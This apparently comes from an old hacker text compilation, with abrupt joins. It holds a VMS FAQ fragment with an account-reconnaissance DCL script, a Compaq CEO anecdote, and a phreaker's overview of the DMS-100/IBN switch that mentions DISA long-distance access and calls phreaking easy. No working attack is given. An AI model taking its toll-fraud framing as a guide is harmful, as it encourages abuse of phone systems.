SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program
( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but
state, priority, physical memory used, page faults, input/output and Process
IDentification numbers, can reveal, in combination, such a nastyness.
Afterwards you may " show process /id=xxxx /continuous ",
or " stop /id=xxxx ".
" Can I view the CPU usage of each process ? "
$ monitor processes /topcpu
will display a bar-chart of this kind.
Run the following .COM file and it will display information you'd
possibly need on an account and/or node. It uses simple lexical functions.
$ output :== write sys$output
$ output ""
$ node_id = F$CSID(context)
$ nodename = F$GETSYI("nodename",,node_id)
$ if F$GETSYI("cluster_member") .EQS. "TRUE"
$ then output " ''nodename' is a member of a cluster. "
$ else output " ''nodename' is not a member of a cluster. "
$ context = ""
$ username = F$GETJPI("","username")
$ output " Username : ''username' "
$ group = F$GETJPI("","grp")
$ output " Group : ''group' "
$ uic = F$USER()
$ output " User Identification Code : ''uic' "
$ pid = F$PID(context)
$ output " Process IDentification : ''pid' "
$ process = F$PROCESS()
$ output " Process Name : ''process' "
$ terminal = F$GETJPI("","terminal")
$ output " Terminal Name : ''terminal' "
$ priority = F$GETJPI("","authpri")
$ output " Authorized Priority : ''priority' "
$ maxjobs = F$GETJPI("","maxjobs")
$ output " Maximum Number of Processes Allowed : ''maxjobs' "
$ authpriv = F$GETJPI("","authpriv")
$ output " Authorized Privileges : ''authpriv' "
$ curpriv = F$GETJPI("","curpriv")
$ output " Current Privileges : ''curpriv' "
$ directory = F$DIRECTORY()
$ output " Directory : ''directory' "
$ protection = F$ENVIRONMENT("protection")
$ output " Protection : ''protection' "
$ boottime = F$GETSYI("boottime")
$ output " Boot Time : ''boottime' "
$ time = F$TIME()
$ output " Current Time : ''time' "
$ version = F$GETSYI("version")
$ output " VMS version : ''version' "
$ output ""
You may :
$ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb
and then transfer lexicals.hlp.
" How can I view/modify my disk quota limit ? "
DiskQuota was a standalone utility in versions prior to five; It is now
a subset of the System Management utility, and thus you should :
$ set def sys$system
$ run sysman
SYSMAN> diskquota show /device=dua1: [1,1]
%SYSMAN-I-QUOTA, disk quota statistics on device DUA1: --
UIC Usage Permanent Quota Overdraft Limit
[1,1] 123456 1500000 100
SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000
Post Scriptum
Some operations require privileges.
Compaq CEO blunders on TV
Compaq CEO Eckard Pfeiffer last week visited The Netherlands
to do some pr work. During a television interview for NOVA,
a well known news show that aired last Friday, Pfeiffer
claimed that pc's were easy to use, and could be used by
virtually anyone. So, the reporter asked him to switch the
tv channel on a Presario that was next to Pfeiffer that ran
a Windows-based TV tuner. The result was Pfeifer frantically
clicking on several menu bars, but instead of switching
channels, he exited the program altogether. To make things
worse, the reporter next asked him to start up a word
processor. Again, Pfeiffer, clicked his way around the
desktop, but couldn't find nor start the program. Finally,
he was asked to start up a game. You saw Pfeifer (now in
deep trouble) clicking on all the tabs of the "easy to use"
tab-works interface that is included on all Presario's,
looking for games, while muttering "Were are ze games? I
can't find ze games on zis machine!!!", his accent becoming
increasingly more German then before. It was almost like Dr.
Strangelove. The last shot is of a Compaq tech support guy,
rushing in to help him out.... So much for ease of use....
Voorburgwal 129, 1012 EP
Amsterdam, The Netherlands).
Ok, I'm going to assume that you already know a little bit about what it
is you're reading. The DMS100/IBN (integrated business network) is
composed of mainly electronic business sets, phones, data units, and
attendant consoles and units, all physically at the customers place of
business. While the digital switching software and support hardware is
located at the Telco. Together, in tandem they work to give the customer
one of the best combinations of features and benefits. The DMS-100
combines voice AND data in one business comunications package. One of
the many advantages is it offers the use with *any* sized business with
up to 30,000 lines. The IBN system controls most operations, diagnoses
problems, and also has the ability to do limited repairs on itself.
Being modular, it can meet the needs at hand, and have the ability for
new features, as time goes by, while still maintaining a cost-effective
environment. Another advantage is that is uses a central attendant where
and when needed. Along with Call Routing, or CDR, to control and
restrict Long Distnace Calling, and network management. The IBN gives
the user hassle free operation. Northern Telcom's DMS-100 switches,
which by the way are digital, are frequently backed-up by their
*higher trained* personnel, which isnt saying much. Some other features
are: Automatic Routing Selection, or ARS, which routes the long distance
calls, if they are even allowed, over the most economical (right) route
available. Station Message Detail Recording, or SMDR, which basically
does just what its name states, records long distance charges, including
but not limited to, originating number, time and length of call,
authorization code, and others... Yet another capability is the Direct
Inward System Access (DISA), which gives the personnel the ability to use
the system to place long distance calls cheaply, even from outside the
company (sounds like a PBX a bit doesn't it?).
System Features and Benefits: There are 6 Call Waiting Lamp Loop Keys,
each with its associated source AND destination lamp to signify the
status of both the calling and the called party status. The Second
feature is Alpha Numeric Display Multiple Directory Number Feature Keys,
up to 42 of them, which can be used for a Paging System, or speed
dialing, and things along those lines. A third feature is the release
Source/Release Destination Console, which features access to paging.
Other features which mainly are unimportant I will list here, they are:
Call Identifier Exclude Source/Exclude Destination. Remote Console Call
Destination. Signal Source.Signal Destination. Call Holding. Call
Detail Entry. Remote Console Call Selection. Console Display. Camp-on
Automatic Recall Conference. A 6 port 2 way splitting non-delayed
operation. Busy Verification of Lines. Manual and Automatic Hold.
Multiple Console OPeration. Busy verification of trunks. Switched Loop
Operation. Trunk Group Busy Indication. Uniform Call distribution form
queue. Multiple listed directory numbers. Control of trunk group
access. Secrecy. Night Service. Serial call. Speed Calling. Lockout.
Delayed Operation. Position Busy. Interposition Calling. THrough Call
Pickup. RIng Again. Multiple Directory Numbers. Intercom. Speed
Call. Call Transfer/Conference. On-Hook Dialing. Additional
Programmable Features include automatic hold. Listem-on hold. Multiple
Appearance Directory Numbers, or MADN. Single Call Arrangement.
Multiple Call Arrangement. Privacy Release. Tone Ringing with Volume
Control. Call Waiting. Stored Number Redial. Private Business Line.
And Finally a 32 character alphanumeric data unit. The DMS100/IBN can be
used as a "standalone" or can be attached to the business set or other
phone type unit. It has the ability to transmit over a two wire loop, at
speeds of up to 56 kb per second, using a proprietary time compression
multiplexing technology. The DMS100 is also available in different
models to suit existing terminal capacities. It also provides integrated
voice/data, that right data, communications. They, the phone company,
and data unit, can operate together, simultaniously, or even independant
of one another. Being fully digitized, it was one if the first switches
to eliminate the use of those dinosaur analog modems (for which i still
have a few if anyone wants to buy em off me or give me shipping money and
ill send em to ya free). Well thats it for now. This should give you a
good understanding of the capabilities of one of the many switches in use
today. In fact, although outdated somewhat, my telco, citizens
utilities, and one in stockton from what i just found out, is still using
this switch (poor me in elk grove, ca eh?)
which makes phreaking quite an easy task, not that it was really ever
hard but anything to make it easier help. ANyway, if you have any
comments/flames/general bullshit, mail it to either
jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a
last resort email address.
---Captain Hook